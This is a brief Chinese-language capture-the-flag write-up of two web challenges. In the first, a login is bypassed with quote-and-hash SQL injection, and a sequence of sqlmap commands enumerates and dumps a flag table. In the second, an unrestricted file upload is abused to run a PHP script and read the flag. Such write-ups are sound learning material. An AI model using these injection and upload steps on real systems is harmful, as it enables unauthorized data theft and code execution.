这次公开赛并没有怎么花时间打,总共就做出两道web。(花时间也不会做)
以下是这两道题的wp
招聘系统
可以注册一个账号进入,会发现有一个页面需要管理员权限
在登录框处存在sql注入漏洞,单引号闭合后,用井号注释掉后面的语句,即可任意密码登陆管理员。
打开那个需要管理员的页面
想到此处可能存在sql注入
加单引号和井号后页面加载时间异常
很可能可以注入
抓个包,居然是get。
放进sqlmap跑一下
sqlmap -r flag.txt
找到变量key存在注入
爆个库,
sqlmap -r flag.txt --dbs
nzhaopin应该就是flag在的库
再暴个表
sqlmap -r flag.txt -D nzhaopin --tables
找到flag表
暴一下字段
sqlmap -r flag.txt -D nzhaopin -T flag --columns
看到flaaag字段
暴flaaag字段
sqlmap -r flag.txt -D nzhaopin -T flag -C "flaaag" --dump
Get flag.
本题手注wp可以参考 1ight师傅的wp
文件上传
先随意上传一个文件,抓包
把文件后缀改php,文件内容改成一段脚本,上传后访问上传到的位置。
发现可以执行任意代码。
看到当前位置后,向后访问
最后在这个目录下找到了flag
直接用cat命令读不到flag,好像flag文件本来就是空的。
运行readflag程序
Get flag.